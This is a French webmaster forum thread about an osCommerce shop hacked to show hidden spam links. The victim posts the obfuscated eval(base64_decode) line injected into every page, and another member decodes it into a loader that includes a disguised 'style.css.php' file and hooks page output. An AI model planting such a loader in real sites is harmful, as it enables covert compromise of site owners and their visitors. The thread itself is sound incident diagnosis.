Virus ? liens externes invisibles apparut dans mon footer ?

[nairod60]

Bonjour
Regarder sur mon site http://www.auxstickers.com environ 500 liens sont apparut dans mon footer ils sont invisible, regarder dans la source de la page pour les voir. Ils pointes tous vers des sites ecommerce infectés tout comme moi par les mêmes liens externes ? j'ai du choper ce truc avec un soft de seo

[UsagiYojimbo]

Ca ou tu t'es fait sniffer tes accès FTP (j'ai eu le cas sur le site d'un client dont le site s'est fait modifier de cette façon suite à la récupération de ses accès FTP).

[Haroeris]

bloques l'accès avec un htaccess pendant tes mises à jour, j'ai eu accès à des informations pendants quelques secondes.

[nairod60]

J'ai trouvé! En haut de toute mes pages j'avais cette ligne (coder) :
"<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lei4zMTMvYXV4c3RpY2svd3d3L2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>"

Et les fichiers sources étaient cachés dans le dossier admin.

Plus d'info ici "http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/"

J'ai chopé ca avec un soft seo que j'ai installé hier, je retrouve le nom et je le poste.

Cordialement DOrian

[raljx]

Code: Tout sélectionner

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/homez.313/auxstick/www/admin/includes/languages/english/images/buttons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}

[UsagiYojimbo]

Je suis pas sûr que le soft SEO soit en cause. Il faut un soft capable de modifier les pages directement sur le serveur pour faire ça, et de traiter du php. Etant donné que tu utilise oscommerce, qui est connu pour ses failles plus que nombreuses, ça sent davantage l'injection SQL ou le détournement des accès FTP.

A ta place je changerais immédiatement mes identifiants FTP déjà.

[nairod60]

Tu avais raison c'était bien une injection.
Faille sur oscommerce rc2a pourtant bien connue (on en apprend tous les jours...).
J'ai passé toute mon après midi et soirée a effacer tous les morceaux de code injecté (tous codés, ce qui de ne facilite pas la tache...) reste plus qu'à boucher la faille!

[UsagiYojimbo]

OsCommerce est franchement le script d'E-Commerce à proscrire, trop de trous de sécu dans tous les sens, et codé avec les pieds (même si à une époque ça ne l'empêchait pas de dominer le marché des scripts E-commerce).